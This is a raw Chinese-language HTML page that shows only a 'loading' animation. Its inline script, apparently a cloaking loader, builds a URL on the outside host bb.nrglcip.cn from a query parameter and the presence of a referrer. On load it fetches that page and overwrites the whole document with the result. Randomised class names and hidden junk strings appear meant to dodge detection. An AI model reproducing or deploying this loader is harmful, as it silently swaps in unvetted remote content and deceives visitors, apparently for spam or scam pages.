<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Tv9BaBy {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Tv9BaBy .ikjUEv093o {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Tv9BaBy .content {
            line-height: 50px;
            text-align: center
        }

        .Tv9BaBy .img {
            width: 100%
        }

        .Tv9BaBy .Su82NFYEz44 {
            text-align: center
        }

        .Tv9BaBy .Su82NFYEz44 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Tv9BaBy .Su82NFYEz44 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Tv9BaBy .Su82NFYEz44 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Tv9BaBy .Su82NFYEz44 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Tv9BaBy .Su82NFYEz44 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Tv9BaBy .Su82NFYEz44 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Tv9BaBy .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function fQn6KsbELP7v(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var iJzl3 = fQn6KsbELP7v('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ iJzl3 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ iJzl3 +".html?a=share";
		}
		
        mLTKgFCAf2=url+"#"+new Date().getTime();
        mLTKgFCAf2 && function() {
            $.get(mLTKgFCAf2, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>r0tHMJKtk9CvKQcZaaCCbU3vEjtZvDEIz4QzoRT</a>
<li style='display:none' >TF5tfTzxjrOAVTEwucH0</li>
<li style='display:none' >TF5tfTzxjrOAVTEwucH0</li><div class="Tv9BaBy">
    <div class="ikjUEv093o">
        <div class="Su82NFYEz44">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >T5lCLKGkGFToNh7RyCfYUwfQiQmh9K9tOPbfGT</li>
<a  href='#' style='display:none'>N8VBbOGlRN9quxw7bxoQACK09gbpvDhOknodpbT4Uy</a>
<ul style='display:none' >HnXAwDYjtmU3wVlPaagSkdI6lhxIsVfMJu07ciF0pDauRWGe6ceALVYpZZZJ1FDS4VrEoF5s2byIqbG8D69nfps</ul>
<b style='display:none' >gxbskNA8XivdHZzXH3TLMbjAlg1Q6EQzRexEOce63gY8mTC</b>
<span style='display:none'>hQKbiEqe3q8Dt9QWt3obiQ517e93Vn9gvkdSNBNv4NODEVXuUajpWbO</span>
<img  src='' style='display:none'>
<img  src='' style='display:none'></body>
</html>